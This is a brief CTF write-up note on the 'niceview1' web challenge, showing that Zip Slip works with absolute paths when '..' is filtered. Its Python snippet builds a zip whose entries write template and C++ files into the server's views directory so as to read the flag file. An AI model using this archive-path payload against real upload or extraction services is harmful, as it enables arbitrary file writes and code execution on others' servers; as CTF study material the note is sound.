====== Zip Slip + Absolute Paths ======


Lessons learned from **TheHackersCrew CTF 2024**: [WEB] niceview1 

  * **Zip Slip** is possible with absolute paths (challenge filtered double dots).

<code python>
payload = f"""
<%inc #include "{rs}_util.json" %>
{{% goflag() %}}
"""

payload2 = """
#include <fstream>
std::string goflag() {
    std::ifstream fin("/app/flag.txt");
    std::string line;
    std::getline(fin, line);
    return line;
}
"""

zf = io.BytesIO()

with zipfile.ZipFile(zf, 'w') as myzip:
    myzip.writestr(f'/app/views/d/{name}.csp', payload)
    myzip.writestr(f'/app/views/d/{name}.csp.csp', payload)
    myzip.writestr(f'/app/views/d/{name}_util.json', payload2)
</code>